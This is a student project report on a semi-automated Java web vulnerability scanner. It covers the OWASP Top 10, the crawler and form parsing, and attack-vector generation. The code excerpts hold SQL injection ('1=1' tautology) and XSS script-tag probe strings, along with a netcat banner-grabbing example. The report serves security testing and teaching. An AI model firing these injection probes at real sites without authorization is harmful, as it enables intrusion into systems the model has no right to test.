Semi-Automated Security Testing of Web applications

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Market research survey on Internet attacks reports that more than 70% of the attacks are on the application layer. This is because 1. More valuable information (electronic money details) is at the application level and 2. Relatively there are more unaddressed vulnerabilities. Considering the fact that there are still inadequate adoption of security development practices across the numerous application development communities, the security testing of the web applications becomes highly critical and rigorous. In our project we have created a penetration testing tool (Black Box Testing Tool) that will check for vulnerabilities in a semi – automated fashion on a target web application. We have tested and demonstrated the functionality and effectiveness of our tool by running this tool on 1. On a target vulnerable web application created by us and 2. On live web sites of a customer organization. The results have been revealing and have been documented appropriately in the following report. We have also provided recommendations as part of corrective action against the discovered vulnerabilities and statements of best practices based on ISO27002 and such other organizations as a preventive action in order to avoid recurrence of such vulnerabilities.

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Submitted by

S. RAGHAVENDAR (31508205078)

RAM G ATHREYA (31508205084)

in partial fulfillment for the award of the degree








APRIL 2012


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Certified that this project report “SEMI-AUTOMATED SECURITY

TESTING OF WEB APPLICATION” is the bonafide work of “S

RAGHAVENDAR(31508205078) AND RAM G ATHREYA (31508205084)”

who carried out the project work under my supervision.


Dr.T.Nagarajan Mr.U.Thiruvaazhi


Professor and Head Assistant Professor

Information Technology Information Technology

SSN College of Engineering, SSN College of Engineering,

SSN Nagar - 603110 SSN Nagar - 603110

Submitted for the examination held on __________________




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We would like to express our sincere thanks to our respected principal

Dr.S.Salivahanan for providing the necessary computing facilities to build our

project in the college premises.

We would like to express our deep gratitude to our Head of the

Department Dr.T.Nagarajan and other staff members for their continuous

encouragement given to us for this work and for their great support in

successfully completing this project.

We wish to express our profound thanks to, our Guide,

Mr.U.Thiruvaazhi for his incredible support in bringing this project to a perfect


We would like to sincerely thank our panel members and all staff of the

IT department who gave us great support and equipped us with the needed

resources required for completing this project.

Finally, we wish to extend our humble gratitude to our parents and

friends for their constant support and encouragement for the completion of the



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Market research survey on Internet attacks reports that more than 70% of the

attacks are on the application layer. This is because 1. More valuable information

(electronic money details) is at the application level and 2. Relatively there are

more unaddressed vulnerabilities. Considering the fact that there are still

inadequate adoption of security development practices across the numerous

application development communities, the security testing of the web

applications becomes highly critical and rigorous.

In our project we have created a penetration testing tool (Black Box Testing

Tool) that will check for vulnerabilities in a semi – automated fashion on a target

web application. We have tested and demonstrated the functionality and

effectiveness of our tool by running this tool on 1. On a target vulnerable web

application created by us and 2. On live web sites of a customer organization.

The results have been revealing and have been documented appropriately in the

following report. We have also provided recommendations as part of corrective

action against the discovered vulnerabilities and statements of best practices

based on ISO27002 and such other organizations as a preventive action in order

to avoid recurrence of such vulnerabilities.


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1.1.1 Application security vulnerabilities 1

1.1.2 Need for semi/automated testing

Tools 1


1.2.1 Objectives 3

1.2.2 Basic Methodology 3


1.3.1 A1: Injection 4

1.3.2 A2: Cross-Site Scripting 5

1.3.3 A3: Broken Authentication and

Session Management 5

1.3.4 A4: Insecure Direct Object

References 5

1.3.5 A5: Cross-Site Request Forgery 6

1.3.6 A6: Security Misconfiguration 6

1.3.7 A7: Insecure Cryptographic Storage 6

1.3.8 A8: Failure to Restrict URL Access 7

1.3.9 A9: Insufficient Transport Layer


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Protection 7

1.3.10 A10: Unvalidated Redirects

And Forwards 7










3.1.1 Miscellaneous vulnerabilities detected 17


4. DESIGN 18



4.1.1 Target URL 19

4.1.2 Banner Grabbing 19

4.1.3 Web Spidering 20

4.1.4 Form Page Listing 21

4.1.5 Form Parameter Modification 22


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4.1.6 Creation of Attack Vectors 22

4.1.7 Attacking 23

4.1.8 Subcrawling 23

4.1.9 Report Vulnerabilities 24


4.2.1 Phase1: Banner Grabbing and

SetProxy 26

4.2.2 Phase2: Crawling 27

4.2.3 Phase3: Form Console and

Attack Vector Creation 28

4.2.4 Phase4: Attacking 29

4.2.5 Phase5: Subcrawling 30



5.1.1 Banner Grabbing 31

5.1.2 Proxy Setting 32


5.2.1 ThreadController 33

5.2.2 SingleThread 33

5.2.3 URLQueue 34

5.2.4 SaveURL 34


5.3.1 DynamicClass 36

5.3.2 FormParams 37


5.4.1 AttackWindow 41


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5.4.2 SQLInject 43

5.4.3 XSSChecker 44

5.4.4 SSLChecker 45


5.5.1 Subcrawler 46




6.1.1 Screenshots of vulnerable Web

Application 47

6.1.2 Phase 1 and Phase 2 49

6.1.3 Phase 3 51

6.1.4 Phase 4 52

6.1.3 Phase 5 54

6.2 RESULTS 55





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1.1 PROBLEM STATEMENTTo create a semi - automated testing tool for identifying vulnerabilities in web applications.

1.1.1 Application security vulnerabilities

Application security encompasses measures taken throughout the application's life-cycle to prevent exceptions in the security policy of an application or the underlying system (vulnerabilities) through flaws in the design, development, deployment, upgrade, or maintenance of the application.

Security vulnerability is a security exposure that results from a product flaw, and which the maker of the product should fix.

Web application security is a branch of Information Security that deals specifically with security of websites, web applications and web services. [Wikipedia, 2012]

1.1.2 Need for semi/automated Testing ToolsAutomated tools save valuable time and money by automating tiresome and very technical processes to find security vulnerabilities.

Such tools serve as aides for human testers, automating many tasks that are time consuming or repetitive.

1.2 PROBLEM DESCRIPTIONThe problem description clearly gives an idea of what we are trying to achieve through our project and what our central objective/goals are.

Vulnerability scanners and more specifically web application scanners, otherwise known as penetration testing tools have been historically used by security organizations within corporations and security consultants to semi-automate the security testing of http request/responses. Given the common size of individual programs (often 500,000 lines of code or more), the human brain cannot execute a comprehensive data flow analysis needed in order to completely check all circuitous paths of an application program to find vulnerability points.


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Physical code reviews of an application's source code can be accomplished manually or in an automated fashion. The human brain is suited more for filtering, interrupting and reporting the outputs of automated source code analysis tools available commercially versus trying to trace every possible path through a compiled code base to find the root cause level vulnerabilities.

The two types of automated tools associated with application vulnerability detection (application vulnerability scanners) are Penetration Testing Tools (often categorized as Black Box Testing Tools) and static code analysis tools (often categorized as White Box Testing Tools).

In this project we have created such a penetration testing tool (Black Box Testing Tool) that will check for vulnerabilities in a semi – automated fashion. We state the vulnerabilities being tested more specifically as follows.

1.2.1 Objectives Identify and evaluate existing (top) automated security testing tools

compare their capabilities in identifying defects. Also mention what these tools fail to achieve.

Propose a solution that will encompass detection of a maximum of these vulnerabilities.

Test the above mentioned solution on a real world application to determine its efficacy.

1.2.2 Basic MethodologyWe try to find out how available automated security testing tools try to identify vulnerabilities in web applications by reverse engineering their processes and implement the same or come up with a better method. We focus on creating custom solutions for standard problems such as Web Spidering, generating forged HTTP Request and Responses, HTML Parsing etc which will be the foundation or bedrock of the functioning of the tool.

We acquire knowledge on standard methods of exploiting vulnerabilities detailed in OWASP by extensively studying already recognized and documented exploits/tutorials.


The Open Web Application Security Project (OWASP) is an open-source application security project. The OWASP community includes corporations,


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educational organizations and individuals from around the world. This community works to create freely-available articles, methodologies, documentation, tools, and technologies. OWASP advocates approaching application security by considering the people, process, and technology dimensions.

The OWASP Top 10 is a list identifying the most serious risks for a broad array of organizations in the domain of Web Application Security. For each of these risks, OWASP provides generic information about likelihood and technical impact using a simple ratings scheme, which is based on the OWASP Risk Rating Methodology.

The OWASP Top 10 Web Application Security Vulnerabilities for 2010 are:• A1:Injection• A2:Cross-Site Scripting• A3:Broken Authentication and Session Management• A4:Insecure Direct Object References• A5:Cross-Site Request Forgery (CSRF)• A6:Security Misconfiguration• A7:Insecure Cryptographic Storage• A8:Failure to Restrict URL Access• A9:Insufficient Transport Layer Protection• A10:Unvalidated Redirects and Forwards

1.3.1 A1: InjectionInjection flaws occur when an application sends untrusted data to an interpreter. Injection flaws are very prevalent, particularly in legacy code, often found in SQL queries, LDAP queries, XPath queries, OS commands, program arguments, etc. Injection flaws are easy to discover when examining code, but more difficult via testing. Scanners and fuzzers can help attackers find them.

1.3.2 A2: Cross – Site Scripting (XSS)

XSS is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content.

There are three known types of XSS flaws:





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1.3.3 A3: Broken Authentication and Session Management

Developers frequently build custom authentication and session management schemes, but building these correctly is hard.

As a result, these custom schemes frequently have flaws in areas such as logout, password management, and timeouts, remember me, secret question, account update, etc.

Finding such flaws can sometimes be difficult, as each implementation is unique.

1.3.4 A4: Insecure Direct Object References

Applications frequently use the actual name or key of an object when generating web pages. Applications don’t always verify the user is authorized for the target object. This results in an insecure direct object reference flaw.

Testers can manipulate parameter values to detect such flaws and code analysis quickly shows whether authorization is properly verified.

1.3.5 A5: Cross – Site Request Forgery (CSRF)

CSRF takes advantage of web applications that allow attackers to predict all the details of a particular action. Since browsers send credentials like session cookies automatically, attackers can create malicious web pages which generate forged requests that are indistinguishable from legitimate ones.

1.3.6 A6: Security Misconfiguration

Security Misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. Developers and network administrators need to work together to ensure that the entire stack is configured properly.

Automated scanners are useful for detecting missing patches, Misconfiguration, use of default accounts, unnecessary services, etc.

1.3.7 A7: Insecure Cryptographic Storage

The most common flaw in this area is simply not encrypting data that deserves encryption. When encryption is employed, unsafe key generation and storage, not rotating keys and weak algorithm usage is common.


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Use of weak or unsalted hashes to protect passwords is also common. External attackers have difficulty detecting such flaws due to limited access. They usually must exploit something else first to gain the needed access.

1.3.8 A8: Failure to Restrict URL Access

Applications are not always protecting page requests properly. Sometimes, URL protection is managed via configuration, and the system is misconfigured. Detecting such flaws is easy. The hardest part is identifying which pages (URLs) exist to attack.

1.3.9 A9: Insufficient Transport Layer Protection

Applications frequently do not protect network traffic. They may use SSL/TLS during authentication, but not elsewhere, exposing data and session IDs to interception. Expired or improperly configured certificates may also be used.

Detecting basic flaws is easy. Just observe the site’s network traffic. More subtle flaws require inspecting the design of the application and the server configuration.

1.3.10 A10: Unvalidated Redirects and Forwards

Applications frequently redirect users to other pages, or use internal forwards in a similar manner. Sometimes the target page is specified in an unvalidated parameter, allowing attackers to choose the destination page.


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Section 2.1 contains our own survey on existing semi/automated security testing tools which have been tabulated for clarity.The rest of the sub – headings that is 2.2, 2.3, 2.4 deal with IEEE papers which were studied for better understanding of the problem and for implementation of our project.

2.1 EXISTING SECURITY TESTING TOOLSFive prevalent automated security testing tools for web applications were taken into consideration and their performance was evaluated with respect to vulnerabilities as specified by OWASP. The conclusions are shown in the table.Name of Tool What it Does What it does not do

N Stalker XSS,HTTP Fingerprinting ,Web Spidering

SQL Injection, Rest of OWASP

SkipFish Handle cookies ,process authentication details ,values of HTML form variables ,detect script back-ups

Detect XSS

NetSparker Command Injection , Remote File Inclusion , SQL Injection , File Upload

CSRF, Blind SQL Injection, Brute Force Password Attack, Reflected XSS, Stored XSS

Acutenix Command Injection , Remote File Inclusion, Sql Injection, File Upload, Brute Force Password Attack, Reflected XSS, Stored XSS

CSRF, Blind SQL Injection

Fig 1. Existing security scanner comparison

2.2 WEB APPLICATION VULNERABILITY TESTINGThe paper assesses the current state of the art tools in automated security testing and carried out a study of:

The class of vulnerabilities tested by these scanners


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Their effectiveness against target vulnerabilities The relevance of the target vulnerabilities to vulnerabilities

found in the wild. To conduct the study the authors use a custom web application vulnerable to known and projected vulnerabilities, and previous versions of widely used web applications containing known vulnerabilities. Their results show the effectiveness of automated tools, as a group, and also their limitations.

Fig 2. Studied Vulnerability ScannersConsolidated table created after comparing above paper and our own survey (3.1) regarding performance of several available security tools.

Name of Tool What it Does What it does not do

N Stalker A2, A3, A9, A10 A1, Rest of OWASPSkipFish A3, A4, A5, A7 A2, Rest of OWASPNetSparker A1, A3, A4, A8, A10 A5. A2, Rest of

OWASPAcunetix A1, A2, A3, A8, A10 A5, Rest of OWASPBurpSuite A1, A2, A3, A4, A5, A8,

A10A6, Rest of OWASP

HP A1, A2, A3, A5, A7 Rest of OWASPIBM A1, A2, A3, A5, A7 Rest of OWASP


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Fig 3. Our Survey on Existing ToolsA1 to A10 as per OWASP Top 10

2.3IMPLEMENTATION OF WEB CRAWLERThe World Wide Web is an interlinked collection of billions of documents formatted using HTML. Due to growing and dynamic nature of the web; it has become a challenge to traverse all URLs in the web documents and to handle these URLs. A focused crawler is an agent that targets a particular

topic and visits and gathers only relevant web pages.The authors [Gupta P, Johari K, Linagay's Univ, Dec. 2009] take one seed URL as input and searches with a keyword, the search results are based on the keyword and it will fetch the web pages where it finds that keyword. This focused based crawler approach retrieves documents that contain particular keywords from the user’s query. The authors implemented the crawler using breadth-first search.

2.4 VULNERABILITY AND ATTACK INJECTION FOR WEB APPLICATIONSIn this paper the authors [Fonseca J, Vieira M., Madeira H., CISUC, Univ. of Coimbra, Coimbra, Portugal (2009)] proposed a methodology to inject realistic attacks in web applications. The methodology is based on the idea that by injecting realistic vulnerabilities in a web application and attacking them automatically we can assess existing security mechanisms. To provide true to life results, this methodology relies on field studies of a large number of vulnerabilities in web applications. The paper also describes a set of tools implementing the proposed methodology.


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Fig 4. Comparison between Scanners



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The project requirement is to create a semi – automated security testing tool (Black Box Testing Tool) that can test for security vulnerabilities in Web Applications. We have created a solution (tool) that will encompass detection of a maximum of OWASP vulnerabilities on a given web page or Web Application.

The above stated tool will be tested on a custom made web application created by us, with known vulnerabilities and the results of the test will be documented and reported. The testing tool will achieve this objective by trying to attack the Web Application based on already familiar attack vectors eg. SQL injection etc

Also the tool will exhaustively test the HTML source code, to check for vulnerabilities and inconsistencies that might lead to attacks. The tool will report the set of OWASP vulnerabilities for the given web application.

3.1 PROJECT SCOPEThe scope defines what the tool will achieve in a crystal clear manner.It is in the form of a table which also specifies what the tool will not achieve and is supplemented with a brief description explaining each vulnerability.


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VulnerabilityWhat we have implemented

What we did not implement


A1 Injection Injection through Forged HTTP Requests

Second order injection Injection involves modifying the URL to make unauthorized queries execute at server side. This can be prevented by validation of URL

A2 XSS Check for escaping using <script> tags

Stored XSS, Reflected XSS and DOM based XSS

Most common OWASP attack. It is executed by including invalid redirects to malicious websites in authenticated pages

A3 Broken Authentication and Session Management

Generate our own forged request trying to impersonate valid user and try to break into authenticated pages

Checking of encryption of passwords in database

By exchanging session cookies attacker can easily impersonate a valid user. So such exchange must be prevented

A4 Insecure Direct Object Reference

Beyond scope of a semi - automated tool

Unauthorized Modification of parameters in URL which result in changes of server side objects

An extension of injection this attack can cause modification of data at server side without proper authentication or validation

A5 Cross Site Request Forgery

Check for use of hidden fields in Form Pages

Whether such hidden fields are actually validated or used for validation

First form of defense against XSS it uses invisible tokens to validate access

A6 Security Misconfiguration

Check for directory listing of files by server

Checking whether default passwords are changed on server.

This attack takes advantage of bad security management on the part of the server and how it handles important user


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Stack traces not displayed to user


A7 Insecure Cryptographic Storage

Beyond scope of a semi - automated tool

Check if hashes are salted. Ensure that encryption is done only at the back end

This is generally difficult to implement in an automated tool since it is subjective and differs from one web application to another

A8 Failure to restrict URL access

Prevent unauthenticated or unauthorized URL access to protected data

Security Privileges & access control

Failure to restrict URL access is a case of bad design on the part of the web developer.

A9 Insufficient Transport Layer Protection

Ensure site uses SSL for authentication pages

Validate SSL Certificate

SSL is an essential mechanism which can be employed to secure a web page

A10 Unvalidated Redirects and Forwards

Allow only POST under <form> method

Verify the parameter(s) are validated to contain only an allowed destination, or element of a destination.

Allowing only post ensures that users cannot perform URL rewriting and go to unintended pages in a web application

Fig 5. Project Scope


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3.1.1Miscellaneous Vulnerabilities DetectedOur tool also detects a few vulnerabilities/defects that do not directly fall under the OWASP Top 10 they are

Auto – complete check Server version disclosure Back end disclosure Set – Cookie HTTPOnly Check

3.2 SOFTWARE USED Java (JDK 1.6) – fundamental programming language in which the

tool is coded Net Beans 6.5 and 6.9 – supporting framework for the development

of the tool Glass Fish version 2 and 3 – supporting web server in which the

vulnerable web application is deployed


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4.1 MODULES – WITH CONCEPTUAL DIAGRAMThe figure explains the conceptual design based on which the tool is built. A short description is also given regarding each module. Fig 6. Conceptual Diagram

Target URLTarget URL

Banner GrabbingBanner Grabbing

Web SpideringWeb Spidering

Form Page ListingForm Page Listing

Form Parameter Modification

Form Parameter Modification

Creation of Attack VectorsCreation of Attack Vectors

Report VulnerabilitiesReport Vulnerabilities


Report VulnerabilitiesReport Vulnerabilities SubcrawlingSubcrawling Report

VulnerabilitiesReport Vulnerabilities


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4.1.1 Target URLHere the target URL is supplied for testing. The target URL is usually a domain name for example like http://www.example.com.

4.1.2 Banner GrabbingBanner Grabbing is an enumeration technique used to glean information about computer systems on a network and the services running its open ports. An intruder can use banner grabbing in order to find network hosts that are running versions of applications and operating systems with known exploits. This is the reason why we include banner grabbing in our tool and we report the results that get returned from this method.

For example one could establish a connection to a target host running a web service with netcat, then send a bad html request in order to get information about the service on the host:

[root@prober]ncwww.targethost.com80HEAD/HTTP/1.1HTTP/1.1200OKDate:Mon,11May200922:10:40ESTServer:Apache/2.0.46(Unix)(RedHat/Linux)Last-Modified: Thu, 16 Apr 2009 11:20:14 PSTETag:"1986-69b-123a4bc6"Accept-Ranges:bytesContent-Length:1110Connection:closeContent-Type: text/html

The administrator can now catalog this system or an intruder now knows what version of Apache to look for exploits.

To prevent this Network Administrators should be sure to restrict access to services on their networks to appropriate networks and be sure to shut down unused or unnecessary services running on network hosts. Hiding of such network information is provided by our tool as a recommendation.


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4.1.3 Web Spidering

We perform Web Spidering by the use of a Web Crawler. A Web crawler is a computer program that browses the World Wide Web in a methodical, automated manner or in an orderly fashion. Other terms for Web crawlers are ants, automatic indexers, bots, Web spiders, Web robots.

This process is called Web crawling or spidering. Many sites, in particular search engines, use spidering as a means of providing up-to-date data. Web crawlers are mainly used to create a copy of all the visited pages for later processing by a search engine that will index the downloaded pages to provide fast searches. Crawlers can also be used for automating maintenance tasks on a Web site, such as checking links or validating HTML code.

Also, crawlers can be used to gather specific types of information from Web pages, such as harvesting e-mail addresses (usually for sending spam).

A Web crawler is one type of bot, or software agent. In general, it starts with a list of URLs to visit, called the seeds. As the crawler visits these URLs, it identifies all the hyperlinks in the page and adds them to the list of URLs to visit, called the crawl frontier. URLs from the frontier are recursively visited according to a set of policies.

The number of possible crawlable URLs being generated by server-side software has also made it difficult for web crawlers to avoid retrieving duplicate content. Endless combinations of HTTP GET (URL-based) parameters exist, of which only a small selection will actually return unique content.

The mathematical permutations of different combinations of inputs create a problem for crawlers, as they must sort through endless combinations of relatively minor scripted changes in order to retrieve unique content.

4.1.4 Form Page Listing

Form pages are critical areas of any Web Application where attacks are possible and mostly carried out. For this reason during the crawling phase we keep a list of all pages that contain <form>…</form> tags with all their associated parameters. These pages are then systematically tested later in a separate Form Console


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where they will be attacked by forged attack vectors and the results are then reported to the user.

4.1.5 Form Parameter Modification

In the form console each form is displayed along with critical information such as URL, action, method and form parameters that are contained under the <form>…</form> tag.

Also the corresponding HTML Source Code is displayed. The user is allowed to supply parameters for the ‘text’ and ‘password’ field contained within the form.

These are used as input parameters for generation of Attack Vectors. For this purpose we use forged HTTP Requests and analyze & audit the response.

4.1.6 Creation of Attack Vectors

The next logical step is to use the input parameters and generate our own Attack Vectors to attack the page in which the form is located.

An attack vector is a path or means by which a hacker (or cracker) can gain access to a computer or network server in order to deliver a payload or malicious outcome. Attack vectors enable hackers to exploit system vulnerabilities, including the human element.

To some extent, firewalls and anti-virus software can block attack vectors. But no protection method is totally attack-proof. A defense method that is effective today may not remain so for long, because hackers are constantly updating attack vectors, and seeking new ones, in their quest to gain unauthorized access to computers and servers.

Attack vectors take advantage of known weak spots to gain entry. Since in Web Applications forms act as gateways of authentication attackers generate attack vectors in such pages to gain unauthorized access to privileged or sensitive information.

For creating attack vectors our tool creates forged HTTP Requests and the created attack vectors check for known and well documented vulnerabilities such as SQL Injection, SSL Encryption, Cross – Site Scripting etc.


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4.1.7 Attacking

This step is a continuation of the previous step in the sense that the forged attack vectors are deployed to detect vulnerabilities or gain unauthorized access.

The attack vectors are deployed sequentially that is first the tool checks for SQL injection then XSS, then SSL and so on and the results are documented by the tool separately and in the case where any of these vectors breach the defenses of the system it is reported to the user and listed as a threat to the underlying system.

4.1.8 Subcrawling

In the case where the defenses of the system are breached and access is possible by the attack vector then the subcrawling process is begun.

This process is similar to the initial crawling process; the only differences being in this case the pages that get listed are authenticated pages which have been broken into by unauthorized access.

Such pages are further tested for vulnerabilities again by the use of known/documented patterns for attacks for example checking for directory listing of files etc.

4.1.9 Report Vulnerabilities

In each of the above processes after vulnerabilities have been detected by the tool they are reported to the user in a precise and concise manner.

The user/administrator is thus intimated to correct the vulnerability specified by the tool and the user/administrator has to then make an informed choice with regards to the mitigation of such vulnerabilities as specified.

4.2 CLASS DIAGRAMSThe Class Diagrams give an implementation overview of the tool in the same way as the Conceptual Diagram gives a design overview.A class diagram in the Unified Modeling Language (UML) is a type of static structure diagram that describes the structure of a system by showing the system's classes, their attributes, operations (or methods), and the relationships among the classes.


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A relationship is a general term covering the logical connections found on class diagrams.

For simplicity the operation of the tool has been split into 5 different phases. They are as follows:

1. Banner Grabbing and Set Proxy2. Crawling3. Form Console and Attack Vector Creation4. Attacking

5. Subcrawling


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4.2.1 Phase 1: Banner Grabbing and Proxy Setting


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4.2.2 Phase 2: Crawling

Fig 8. Phase 2 Class Diagram


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4.2.3 Phase 3: Form Console and Attack Vector Creation

Fig 9. Phase 3 Class Diagram

4.2.4 Phase 4: Attacking


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Fig 10. Phase 4 Class Diagram


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4.2.5 Phase 5: Subcrawling

Fig 11. Phase 5 Class Diagram


5.1 PHASE 1 IMPLEMENTATIONPhase 1 as mentioned earlier involves Banner Grabbing and Set Proxy. Set Proxy is a feature that can be used in the case where the local machine


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uses a proxy server to gain access to the internet. Otherwise it is blank be default.Separate classes have been declared to handle each operation in an isolated and independent manner. The implemented mechanisms are then called by the GUI class object which is the first window that is displayed by the tool to the user.

5.1.1 Banner Grabbing

Banner Grabbing is achieved by the tool by the use of the AssetFinder class.

The AssetFinder class retrieves the following information from the HTTP banner of the Web Application:

1. Getting IP Address and Location

2. Getting Set-Cookie value

3. Getting no – cache and pragma values

4. Getting server information

5. Getting Back End Solution used by the Web Application

Source Code for IP address and Location Retrieval

InetAddress <address> = InetAddress.getByName(<url>);


Source Code for Getting the other parameters

HttpURLConnection <connection> = (HttpURLConnection) new URL(<url>).openConnection();

Map <map> = <connection>.getHeaderFields();

5.1.2 Proxy Setting

Proxy can be set for the tool by the use of the Proxy class which is a JFrame where the proxy server and the proxy port can be set. For example the proxy server could be proxy.example.net and port could be 8080.

This can be set in the proxy window and it will be incorporated throughout the tool to facilitate connection with the internet.

Source Code for Setting Proxy Server and Proxy Port


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System.setProperty("http.proxyHost", <ProxyServer>);

System.setProperty("http.proxyPort", <ProxyPort>);

5.2 PHASE 2 IMPLEMENTATIONPhase 2 is the crawling phase. The target URL is received in a text box in the GUI JFrame and the crawler is called which retrieves all the links of the given Web Application without any duplication of links.

Four classes are implemented for this purpose they are:1. ThreadController2. SingleThread3. URLQueue4. SaveURL

5.2.1 ThreadController

The Crawler is implemented using a synchronized multithreaded mechanism. To control all these individual threads a base thread has been defined in the ThreadController class. The function of this class is to control all individual threads.

The function of this class is to pass a single link of the target Web Application to each individual thread and the list of links that is returned from the single thread is processed and displayed to the user.

Source Code for creating individual threads and processing links

Single_Thread <singlethread>=new Single_Thread();

<singlethread>.process(<url>, <alreadyprocessedlinks>);

5.2.2 SingleThread

Each thread which receives a link URL from ThreadController creates a saveURL object and processes all links within the page. All these links are returned to ThreadController which are then stored in URLQueue object in the gathered links parameter.

Source Code for creation of SaveURL object and link extraction

saveURL <saveurl>=new saveURL();


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String <rawpage>=<saveurl>.getURL(<url>);



5.2.3 URLQueue

The URLQueue class stores the links gathered from SaveURL class and passed on by the SingleThread class. Also the links that have been passed to SingleThread class are stored in the gatheredlinks parameter.Source Code for pushing new links into the queue

LinkedList <queue> = <queue>.addLast(<url>);


Source Code for popping links passed to SingleThread

LinkedList <queue> = <queue>.removeFirst();


5.2.4 SaveURL

The SaveURL class is the actual place where link extraction happens. For doing so a connection object needs to be created and the URL from SingleThread class must be passed as a parameter to it.

Also the HTML source code of the page must be retrieved and locally stored. It must later be processed for links ie for <a href…> tags and the href argument needs to be stored as links from the given page.

This output is passed on to SingleThread which passes it on to ThreadController and finally gets added in URLQueue without any duplication.

Source Code for making connection and retrieving HTML page source

BufferedInputStream <bufferedinputstream> = new BufferedInputStream(<url>.openStream());

StringWriter <stringwriter>=new StringWriter();



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String <page> = <stringwriter>.toString();

Source Code for link extraction

int <index>=<page>.indexOf("<a", <index>);

if((<index>=page.indexOf("href", <index>))==-1)break;

if((<index>=page.indexOf("=", <index>))==-1)break;

StringTokenizer <stringtokenizer>=new StringTokenizer(<page>, "\t\n\r\"'>#");

String <link>=st.nextToken();

Vector <links>=new Vector();<links>.add(link);

5.3 PHASE 3 IMPLEMENTATIONPhase 3 involves segregation of those pages having “form” tags in them since such pages are sources of dynamic content. The URL, page source and form parameters of such pages are derived and stored. The result of this process is displayed in the AttackWindow class which is another JFrame.

This phase involves two classes they are:1. DynamicClass2. FormParams

5.3.1 DynamicClass

The DynamicClass class stores all <form>…</form> tags from the gathered web pages in the crawling phase. The class contains the URL and page source of each page that has a <form> tag in it.

This URL and page source are sent as arguments for an object of the FormParams class which is used to process the <form> tag and store its parameters.

Source Code for adding URL and pagesource

static TreeSet <page> = new TreeSet();

static TreeSet <url> = new TreeSet();


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<url>.add(<_url>); //retrieved from SaveURL class

<page>.add(<_page>); //retrieved from SaveURL class

Source Code for calling FormParams class

FormParams <formparams> = new FormParams(<url>, <page>);


5.3.2 FormParams

The FormParams class receives the URL and page source of the page that has the <form> tag and processes it for its constituent parameters.

Source Code for retrieving form name

int <index> = <page>.indexOf("<form");

<index> = <page>.indexOf("name=\"", <index>);


String <FormName>=<page>.substring(<index>, <page>.indexOf("\"", <index>));

Source Code for retrieving form method

int <index> = <page>.indexOf("<form");

int <index> = <page>.indexOf("<form");

<index> = <page>.indexOf("method=\"", <index>);


String <FormMethod>=<page>.substring(<index>, <page>.indexOf("\"", <index>));

Source Code for retrieving form action

int <index> = <page>.indexOf("<form");


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int <index> = <page>.indexOf("<form");

<index> = <page>.indexOf("action=\"", <index>);


String <FormAction>=<page>.substring(<index>, <page>.indexOf("\"", <index>));

Source Code for retrieving individual parameters

public String []<params_name>=new String[100];

public String []<params_type>=new String[100];

public int <params_count>=0;

int <index>=page.indexOf("<input"), <index2>;

while(<index>!=-1) { <index2> = <page>.indexOf("type=", <index>);

<index2>+ = 6;

<params_type>[<params_count>] = <page>.substring(<index2>,

<page>.indexOf("\"", <index2>));

<index2> = <page>.indexOf("name=", <index>);

<index2>+ = 6;

<params_name>[<params_count>] = <page>.substring(<index2>, <page>.indexOf("\"", <index2>));

<index> = <page>.indexOf("<input", <index>+1);


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<params_count>++; }

5.4 PHASE 4 IMPLEMENTATIONIn Phase 4 the parameters retrieved by the FormParams class are displayed to the user and the user is free to modify them and generate HTTP Requests.

Also these parameters are used for creation of attack vectors by modification of the query string

In the World Wide Web, a query string is the part of a Uniform Resource Locator (URL) that contains data to be passed to web applications such as CGI programs, servlets, ASP, PHP etc.

A typical URL containing a query string is as follows:

http://server/path/program?query_stringThese attack vectors check for vulnerabilities such as SQL Injection,

XSS etc.Separate classes have been declared for these purposes.

This phase involves two classes they are:1. AttackWindow2. SQLInject3. XSSChecker4. SSLChecker

5.4.1 AttackWindow

The AttackWindow class is a JFrame in which the Form Console is contained. It also is the class which creates the query string required for successful authentication from parameters supplied by the user.

Also it displays additional information such as whether hidden fields are used in the form and if auto complete is disabled or not.


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It is also the class in which all attack vector’s query strings are formulated.

Source Code for formulation of query strings

String <query>="?", <inject_query>="?", <xss_query>="?";

String <XSS_Injector_String> = "%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28995001%29%3c%2fScRiPt%3e";


if(DynamicClass.<formparams>.params_type[<count>].equals("text") || DynamicClass.<formparams>.params_type[<count>].equals("password"))break;


if(!DynamicClass.<formparams>.params_type[<count>].equals("password")){<inject_query>=<inject_query>+DynamicClass.<formparams>.params_name[<count>]+"="+Text.getText()+"&"; <xss_query>=<xss_query>+DynamicClass.<formparams>.params_name[<count>]+"="+<XSS_Injector_String>+"&";}

else {<inject_query>=<inject_query>+DynamicClass.<formparams>.params_name[<count>]+"=hi\'+or+\'1=1";<xss_query>=<xss_query>+DynamicClass.<formparams>.params_name[<count>]+"="+


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<XSS_Injector_String>+"&"; }

String <url_string>=DynamicClass.urlsource;String <inject_string>="", xss_string="";




SQLInject.connect(<inject_string>, DynamicClass.urlsource);



5.4.2 SQLInject

The SQLInject class creates an attack vector and checks for possibility of SQL Injection in the given page. It receives the inject string and base url as input from the AttackWindow class and checks for possibility of SQL Injection.

Source Code for checking of SQL Injection is

String <page>=””, <page2>=””;

HTTPURLConnection <connection> = (HttpURLConnection) new URL(_inject_string).openConnection();

<page>=<page source of response from connection object>

HTTPURLConnection <connection2> = (HttpURLConnection) new URL(_inject_string).openConnection();

<page2>=<page source of response from connection2 object>

if(!<page>.equals(<page2>)) return "SQL Possible"; else return "SQL Not Possible";


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5.4.3 XSSChecker

The XSSChecker class creates an attack vector and checks if XSS is possible on the given page. It receives the xss string as input from the AttackWindow class and checks for possibility of XSS.

Source Code for checking for XSS is

static HttpURLConnection <connection>;static String <page>="";

<connection> = (HttpURLConnection) new URL(<_inject_string>).openConnection();<page>=<page source of response from connection object>

if(<_page>.indexOf("\'\"()&%1")!=-1)return "XSS Possible"; return "XSS Not Possible";

5.4.4 SSLChecker

The SSLChecker class creates an attack vector and checks SSL is implemented in the page. Source Code for checking for SSL implementation is

String <SSL_Checker>=””; try {<SSL_Checker>="false"; <url>="https"+<url>; HttpURLConnection <connection> = (HttpURLConnection) new URL(<url>).openConnection();

<SSL_Checker>="true"; } catch (Exception ex) {<SSL_Checker>="false";}

5.5 PHASE 5 IMPLEMENTATIONPhase 5 implementation is the subcrawling process. This phase comes into play only if basic authentication credentials supplied by the user in the


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form console which is used for generating a forged HTTP Request actually returns an authenticated page.

This implies that the authentication mechanism used by the server does not sufficiently restrict URL access.

